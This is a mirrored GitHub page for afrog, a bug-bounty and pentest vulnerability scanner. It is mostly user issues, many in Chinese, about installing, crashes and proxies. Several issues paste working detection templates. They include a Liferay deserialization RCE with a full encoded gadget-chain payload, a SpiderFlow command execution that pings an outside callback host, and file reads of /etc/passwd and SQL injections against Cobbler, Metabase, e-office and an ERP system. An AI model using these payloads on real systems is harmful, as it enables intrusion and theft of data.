zan8in / afrog Goto Github PK

View Code? Open in Web Editor NEW

2.8K 46.0 334.0 25.54 MB

A Security Tool for Bug Bounty, Pentest and Red Teaming.

License: MIT License

Go 74.76% HTML 25.24%

vulnerability-scanner poc penetration-testing afrog vulnerability-scanning-tools bug-bounty pentest red-teaming

afrog's Introduction

afrog's People

Contributors

Stargazers

Watchers

Forkers

ltvthang jaie0801 kalimon12 sec-fork tim1995 1h32xb5 functfan afwu evi1hack klinklinklin ykwiss killvxk asura88 hadesangel greatspider135 ifofor lovelj520 s00x3r gamblingmaster2020 zwjjustdoit zhuanyedecainiao medasz ckevens ko-sec newsheep1 gaosongs dingxiao77 thinkergod s3rmvc wuha0926 atomxw phuong39 explangcn sunjikui 1001101100 msr00t zoombegod tkmyles zanbin168 toma233 skybky sxx2022 cuojue6 wangyi0127 gaobrian liuhw-1025 lovepou binganao imemaker secjia ubeeegame lazylee007 mrksec djsousuo zxc2007 bowman03 fumengze harry1080 this-is-y jh195845886 shuxxing gysf666 lurker27 kenuoseclab fgz00 white-hua bingpo velgar n0mi99 jeffry38 xyongsec hitaooo neophack istoliving testitok chennqqi tiepingsheng qimingstar mygit2014 yvwulei darkkid0 bopo geary0124 false-sec expzhizhuo nanaao rs0d arno567 diggold 482949203 xiumulty topsec-bunney sulab999 sry309 jackypeng66 0xsojalsec navin-hacsociety ks236 wuli888 bawed

afrog's Issues

Install on Linux

Can you add to the readme how to install on linux?

info:
  name: thinkCMF 文件包含
  author: rain
  severity: Critical
  description: |
    在受影响的版本中,可通过漏洞实现任意文件写入或任意代码执行
    影响版本:
      thinkCMFX 1.6.0-2.2.3
    修复版本:
      metabase version >= 0.40.5
      metabase version >= 1.40.5
  reference:
    - https://www.thinkcmf.com/

rules:
  r0:
    request:
      method: GET
      path: /?a=fetch&templateFile=public/index&prefix="&content=die(@md5(thinkcmf))
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
    expression: response.status == 200 && "3bedf9f6e16de1cb5403356aaa7bec38".bmatches(response.body)
expression: r0()

复现

afrog.exe -t http:xxxx像是报错想了解为啥会这样

Downloading the latest version of afrog-pocs...
panic: flate: corrupt input before offset 5

goroutine 1 [running]:
github.com/zan8in/afrog/pkg/utils.Unzip.extractAndWriteFile.func1()
github.com/zan8in/afrog/pkg/utils/unzip.go:58 +0x3c
github.com/zan8in/afrog/pkg/utils.Unzip.extractAndWriteFile({}, {0xc000526108, 0x12}, 0xc000542420)
github.com/zan8in/afrog/pkg/utils/unzip.go:90 +0x3a2
github.com/zan8in/afrog/pkg/utils.Unzip.Extract({}, {0xc00003b1a0?, 0xc000117901?}, {0xc000526108, 0x12})
github.com/zan8in/afrog/pkg/utils/unzip.go:40 +0x225
github.com/zan8in/afrog/pkg/upgrade.(*Upgrade).Unzip(0xc00016a1e0, {0xc00003b1a0?, 0x101a768?})
github.com/zan8in/afrog/pkg/upgrade/upgrade.go:133 +0x3d
github.com/zan8in/afrog/pkg/upgrade.(*Upgrade).Download(0xc00016a1e0)
github.com/zan8in/afrog/pkg/upgrade/upgrade.go:121 +0x9f
github.com/zan8in/afrog/pkg/upgrade.(*Upgrade).UpgradePocs(0xc00016a1e0)
github.com/zan8in/afrog/pkg/upgrade/upgrade.go:103 +0x10f
github.com/zan8in/afrog/pkg/config.(*Options).verifyOptions(0xc0006041a0)
github.com/zan8in/afrog/pkg/config/options.go:229 +0x6f0
github.com/zan8in/afrog/pkg/config.NewOptions()
github.com/zan8in/afrog/pkg/config/options.go:174 +0x1405
main.main()
./main.go:26 +0x2e

    会这样子报错

afrog-config.yaml中的代理参数无法生效

使用ssr-command-client挂上shadowsocksr代理，无法成功走代理。地址：https://github.com/TyrantLucifer/ssr-command-client/
配置方式：
hattp://127.0.0.1:1080
socks://127.0.0.1:1080
socks5://127.0.0.1:1080
三种方式都不太行

这工具怎么用的

进来看readme我都没弄明白怎么用的，afrog直接也不能用啊，是需要编译还是怎么

自定义afrog-pocs路径

默认情况下，afrog-pocs的路径是固定的。
windows下：C:\Users\Administrator\afrog-pocs
linux下：/home/ubuntu/afrog-pocs
建议模仿nuclei，增加-td参数，指定afrog-pocs的默认路径。

Tip: Fingerprint has been disabled, the replacement tool is Pyxis (https://github.com/zan8in/pyxis)

sangfor-vpn-supersession-rce.yaml

获取rsa key咋利用？

无法更新 ./afrog_linux --up

CVE-2021-22145 检测规则不准确存在误报

https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/g-CVE/2021/CVE-2021-22145.yaml
参考https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/elasctic-memory-leak-cve-2021-22145.yaml
StatusCode() >= 400 && StringSearch("response", '"root_cause"') && StringSearch("resHeaders", "application/json") && StringSearch("response", 'truncated')

响应报文包含truncated时，才判断有漏洞。
afrog认为响应报文包含reason时存在漏洞。
实际扫描发现，afrog对reason的判断，似乎是不准确的，存在误报。

不支持https？

afrog的poc和nuclei的poc格式是否通用呢？

源码修改后的window下和linux下不一致

在源码中添加自定义请求头，编译运行后使用zeek捕捉http请求，发现afrog.exe运行后可以抓到自定义头，在linux下执行没有找到

csz-cms-multiple-blind-sql-injection存在误报

扫描结果空白

每次启动扫描都要将所有POC下载一遍，但是文件夹又是空的，还扫描不出来任何结果。每次扫描必须指定端口才可以扫描到结果吗？

CVE-2020-7961

测试靶场：vulhub/liferay-portal/CVE-2020-7961
验证：

id: CVE-2020-7961

info:
  name: Liferay Portal RCE 反序列化命令执行漏洞
  author: leo
  severity: high
  verified: true
  description: |
    Liferay Portal CE是一款用来快速构建网站的开源系统。其7.2.0 GA1及以前的版本API接口中存在一处反序列化漏洞，利用该漏洞可在目标服务器上执行任意命令。
    FOFA：app="Liferay"
  reference:
    - https://www.anquanke.com/post/id/240042

set:
  randstr: randomLowercase(15)

rules:
  r0:
    request:
      method: POST
      path: /api/jsonws/invoke
      headers:
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        command: echo {{randstr}}
      body: |
        cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=pZryCOb2&formDate=1679026956587&tableId=1&name=1&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B7870000000027372002B6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E436F6D70617261746F72E3A188EA7322A4480200024C000A636F6D70617261746F7271007E00014C000870726F70657274797400124C6A6176612F6C616E672F537472696E673B78707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707400106F757470757450726F706572746965737704000000037372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000002757200025B42ACF317F8060854E0020000787000000BCECAFEBABE0000003200900A0003002207008E07002507002601001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700270100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002801003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E010043636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F73656375726974792F6163636573732F636F6E74726F6C2F416363657373436F6E74726F6C5574696C07002A010017676574416363657373436F6E74726F6C436F6E7465787401004028294C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F73656375726974792F617574682F416363657373436F6E74726F6C436F6E746578743B0C002C002D0A002B002E01003C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F73656375726974792F617574682F416363657373436F6E74726F6C436F6E7465787407003001000B676574526573706F6E736501002A28294C6A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73653B0C003200330A0031003401000A6765745265717565737401002928294C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B0C003600370A00310038010007636F6D6D616E6408003A0100256A617661782F736572766C65742F687474702F48747470536572766C65745265717565737407003C010009676574486561646572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0C003E003F0B003D00400100076F732E6E616D650800420100106A6176612F6C616E672F53797374656D07004401000B67657450726F70657274790C0046003F0A004500470100106A6176612F6C616E672F537472696E6707004901000B746F4C6F7765724361736501001428294C6A6176612F6C616E672F537472696E673B0C004B004C0A004A004D01000377696E08004F010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A0C005100520A004A0053010007636D642E6578650800550100022F63080057010004626173680800590100022D6308005B0100116A6176612F6C616E672F52756E74696D6507005D01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C005F00600A005E006101000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C006300640A005E00650100116A6176612F6C616E672F50726F6365737307006701000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0C0069006A0A0068006B0100116A6176612F7574696C2F5363616E6E657207006D010018284C6A6176612F696F2F496E70757453747265616D3B29560C000A006F0A006E00700100025C6108007201000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0C007400750A006E00760100076861734E65787401000328295A0C007800790A006E007A0100046E6578740C007C004C0A006E007D01000008007F0100106C6966657261795263654465746563740800810100266A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E7365070083010009736574486561646572010027284C6A6176612F6C616E672F537472696E673B4C6A6176612F6C616E672F537472696E673B29560C008500860B008400870100135B4C6A6176612F6C616E672F537472696E673B0700890100136A6176612F696F2F496E70757453747265616D07008B01000D537461636B4D61705461626C6501001E79736F73657269616C2F50776E65723130323233313931343032353530300100204C79736F73657269616C2F50776E65723130323233313931343032353530303B002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000002F000E0000000C000100000005000F008F00000001001300140002000C0000003F0000000300000001B100000002000D00000006000100000034000E00000020000300000001000F008F000000000001001500160001000000010017001800020019000000040001001A00010013001B0002000C000000490000000400000001B100000002000D00000006000100000038000E0000002A000400000001000F008F00000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A00080029000B0001000C000000D50005000A0000009AA70003014CB8002FB600354DB8002FB600394E2D123BB9004102003A041243B80048B6004E1250B600543605150599001B06BD004A5903125653590412585359051904533A06A7001806BD004A5903125A535904125C5359051904533A06B800621906B60066B6006C3A07BB006E591907B700711273B600773A081908B6007B99000B1908B6007EA7000512803A092C12821909B900880300B100000001008D00000029000503FF00450006000507008407003D07004A010000FC001407008AFD002C07008C07006E4107004A0002002000000002002100110000000A000100020023001000097571007E0010000001D4CAFEBABE00000032001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100254C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A01002379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501001F79736F73657269616C2F7061796C6F6164732F7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000003C000E0000000C000100000005000F001200000002001300000002001400110000000A000100020016001000097074000450776E72707701007871007E000D78%3B%22%7D
    expression: response.raw_header.bcontains(bytes(randstr))
expression: r0()

CVE-2021-31805

CVE-2021-31805 POC根本跑不出来噢~

pocs update failed

json输出没反应

打扰了,刚看了代码,有漏洞的时候才输出json。

无法更新下载poc

批量检测存活后不扫描了

I can not run it

Hi,
i setup it using git clone then iam trying to run it but i do not know why or what should i do next.
Any help about the next steps to run it ?

json输出内容添加

目前json输出三个字段{"name":"xxx","severity":"xx","url":"http://xxx"} ，可以使用的场景比较少，可以考虑添加，请求包，响应包、poc文件里面的info字段的所有内容和id等等，就通过指定参数的形式添加输出内容，就好像nuclei的一样，个人比较喜欢用afrog

go build main.go之后就报错

pkg/runner/cel.go:15:2: google.golang.org/[email protected]: Get "https://proxy.golang.org/google.golang.org/genproto/@v/v0.0.0-20210831024726-fe130286e0e2.zip": dial tcp 172.217.163.49:443: i/o timeout
pkg/proto/http.pb.go:10:2: google.golang.org/[email protected]: Get "https://proxy.golang.org/google.golang.org/protobuf/@v/v1.28.1.zip": dial tcp 172.217.163.49:443: i/o timeout
pkg/proto/http.pb.go:11:2: google.golang.org/[email protected]: Get "https://proxy.golang.org/google.golang.org/protobuf/@v/v1.28.1.zip": dial tcp 172.217.163.49:443: i/o timeout
pkg/poc/poc.go:9:2: gopkg.in/[email protected]: Get "https://proxy.golang.org/gopkg.in/yaml.v2/@v/v2.4.0.zip": dial tcp 172.217.163.49:443: i/o timeout
就主要报这个错，师傅我该怎么解决呀，用代理也不行

CNVD-2018-16876

漏洞详情

id: CNVD-2018-16876

info:
  name: Cobbler任意文件读取漏洞
  author: rain
  severity: medium
  description: |
    Cobbler是一款网络安装服务器套件，它能够快速建立Linux网络安装环境。
    Cobbler 2.6.11-1版本中存在任意文件读取漏洞。攻击者可利用该漏洞读取任意文件。
  reference:
    - https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-9605

rules:
  r0:
    request:
      method: POST
      path: /cobbler_api
      headers:
        Content-Type: text/xml
        Accept-Encoding: gzip
    body: |
    <?xml version='1.0'?><methodCall><methodName>generate_script</methodName><params><param><value><string>windows10</string></value></param><param><value><string></string></value></param><param><value><string>/etc/passwd</string></value></param></params></methodCall>
    expression: response.status == 200 && "root:[x*]?:0:0:".bmatches(response.body)
expression: r0()

本地测试通过

Which API Key and which Domain should we have to configure in afrog-config.yaml

Failed to start afrog，please edit api-key and domain in /root/.config/afrog/afrog-config.yaml

e-office-v10-sql-inject

id: e-office-v10-sql-inject

info:
  name: 泛微 eoffice v10 前台 SQL 注入
  author: 你是猪
  severity: high
  description: |
    FOFA：fid="2csJpuWtfTdSAavIfJTuBw=="
    进一步利用/验证方法，参考下面 reference 链接
  reference:
    - https://www.hedysx.com/2777.html

rules:
  r0:
    request:
      method: GET
      path: /eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10
    expression: response.status == 200 && response.body.bcontains(b'<p>未找到相关数据</p>')
expression: r0()

SpiderFlow-save-rce

id: SpiderFlow-save-rce
info:
  name: SpiderFlow save 远程命令执行漏洞
  author: laohuan12138
  severity: high
  description: |
    spiderflow 是一个爬虫平台，以图形化方式定义爬虫流程，无需代码即可实现一个爬虫,其中/function/save接口存在命令执行漏洞，可获取系统权限。
    fofa: title=="SpiderFlow"
  reference:
    - https://cn-sec.com/archives/1366553.html

set:
  reverse: newReverse()
  reverseHost: reverse.url.host

rules:
  r0:
    request:
      method: POST
      path: /function/save
      body: |
        id=&name=cmd&parameter=yw&script=}Java.type('java.lang.Runtime').getRuntime().exec('ping {{reverseHost}}');{
    expression: reverse.wait(5)

expression: r0()

url扫描识别

url和接口进行爬取后在进行漏洞扫描

师傅，这个可以直接使用nuclei的poc吗

install

just an inquiry on how to install considering no documentation is provided

ceye.io挂了反链平台失效

是否修改掉用自用的 dnslog-go平台

师傅考不考虑加个代理参数

Mac

Hello

can someone show me the steps to install this tool on a MacBook?
Thanks

一个小的Tips

单url速度很快，一批url速度就慢了，期待加入多线程

3.0 rce确定存在？

师傅，本地搭的3.0环境没有成功复现呢

关于一个小小的编码问题

我在编写如下poc 验证时发现一个问题，返回包的编码问题可能会影响类似这种匹配规则 response.body.bcontains(b'\x7e\x70\x05\x53\x6e')

编写的poc内容如下：
id: e-cology-weaver-v9-dbconfigreader-info-leak

info:
name: 泛微OA e-cology V9前台数据库帐号密码信息泄漏漏洞
author: secse(https://github.com/forktopot)
severity: high
description: 泛微OA ecology v9数据库帐号密码信息泄漏漏洞 app="Weaver-OA"
reference:
- https://github.com/jas502n/DBconfigReader

rules:
r0:
request:
method: GETF
path: /mobile/DBconfigReader.jsp
follow_redirects: false
expression: response.status == 200 && (response.body.bcontains(b'\x7e\x70\x05\x53\x6e') || response.body.bcontains(b'\x7e\x70\x05\x40\x73'))
expression: r0()

该poc我在xray 上使用是完全没有问题然后改过来的
一开始无法验证，然后我把 pkg/protocols/http/retryhttpclient/client.go p179 行修改后便可以验证了

yunshikong-ERP-SQL-injection

id: yunshikong-ERP-SQL-injection
info:
  name: yunshikong-ERP-SQL-injection
  author: laohuan12138
  severity: high
  description: |
    云时空 社会化商业ERP系统存在SQL注入漏洞，攻击者通过漏洞可以获取数据库敏感信息
    FOFA: title="云时空社会化商业ERP"
  reference:
    - https://wiki.peiqi.tech/wiki/webapp/云时空ERP/云时空%20社会化商业ERP系统%20validateLoginName%20SQL注入漏洞.html
rules:
  r0:
    request:
      method: GET
      path: /sys/user/validateLoginName?loginName=admin'
    expression: response.status == 500 && response.body.bcontains(b"SQLException")
expression: r0()

师傅这个扫描不走代理的嘛，在配置文件里设置burp代理，在burp中没有数据包诶

./afrog -up更新问题

./afrog -up更新的时候报如下错误，请问下有问题没？

[ERR] ceye reverse service not set: /root/.config/afrog/afrog-config.yaml

| A F R O G > 2.3.1 - 0.1.99
[FTL] Could not create runner: target not found

【BUG】在输出数据时响应包缺失

如果response包过大则不会保存完整响应包数据， html和json都一样

CVE-2021-41277

漏洞详情

id: CVE-2021-41277

info:
  name: Metabase 输入验证错误漏洞
  author: rain
  severity: high
  description: |
    在受影响的版本中，自定义 GeoJSON 地图（admin->settings->maps->custom maps->add a map）操作缺少权限验证，攻击者可通过该漏洞获得敏感信息。
    影响版本:
      metabase version < 0.40.5
      metabase version >= 1.0.0, < 1.40.5
    修复版本:
      metabase version >= 0.40.5
      metabase version >= 1.40.5
  reference:
    - GHSA-w73v-6p7p-fpfr

rules:
  r0:
    request:
      method: GET
      path: /api/geojson?url=file:///etc/passwd
      headers:
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
        Accept-Encoding: gzip, deflate
    expression: response.status == 200 && "root:[x*]?:0:0:".bmatches(response.body)
  r1:
    request:
      method: GET
      path: /api/geojson?url=file:///etc/resolv.conf
      headers:
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
        Accept-Encoding: gzip, deflate
    expression: response.status == 200 && "namespace".bmatches(response.body)
expression: r0() || r1()

测试结果：

虚假PoC 建议删除

CVE-2023-0297.yaml
https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/
Also, due to the lack of CSRF protection, a victim can be tricked to execute arbitrary python code
CSRF触发的RCE

hi

How to install in Kali Linux

启动 afrog 出错，rerverse CeyeApiKey or CeyeDomain is Empty in your /home/[yourname]/.config/afrog/afrog-config.yaml

thx

师傅是这样用的吗?为什么会报错

─$ /home/kali/Desktop/afrog_linux_amd64 -T /home/kali/Desktop/vulmap-0.9/list.txt -o afrog_result1.html 2 ⨯
一个挖洞工具 A tool for finding vulnerabilities - V1.2.7
Default Conf /home/kali/.config/afrog/afrog-config.yaml
Default Pocs /home/kali/afrog-pocs v0.1.0
Output Report afrog_result1.html
2/926 | 0% panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0xa57b41]

goroutine 55 [running]:
github.com/zan8in/afrog/pkg/core.(*Engine).ReleaseChecker(0xc0003480f0, 0xc0003418c0)
C:/Users/zanbi/go/src/github.com/zan8in/afrog/pkg/core/engine.go:32 +0x21
github.com/zan8in/afrog/pkg/core.(*Engine).executeExpression(, {, }, {{0xc000356ec0, 0x1c}, {0x0, 0x0}, {0x0, 0x0, 0x0}, ...})
C:/Users/zanbi/go/src/github.com/zan8in/afrog/pkg/core/excute.go:74 +0x1b2
github.com/zan8in/afrog/pkg/core.(*Engine).executeTargets.func2({, _}, {{0xc000356ec0, 0x1c}, {0x0, 0x0}, {0x0, 0x0, 0x0}, {0x0, ...}, ...})
C:/Users/zanbi/go/src/github.com/zan8in/afrog/pkg/core/excute.go:62 +0xc5
created by github.com/zan8in/afrog/pkg/core.(*Engine).executeTargets
C:/Users/zanbi/go/src/github.com/zan8in/afrog/pkg/core/excute.go:59 +0x392

zan8in / afrog Goto Github PK

afrog's Introduction

afrog's People

Contributors

Stargazers

Watchers

Forkers

afrog's Issues

复现

漏洞详情

本地测试通过

./afrog -up更新的时候报如下错误 ，请问下有问题没？

漏洞详情

测试结果：

Recommend Projects

Recommend Topics

Recommend Org

./afrog -up更新的时候报如下错误，请问下有问题没？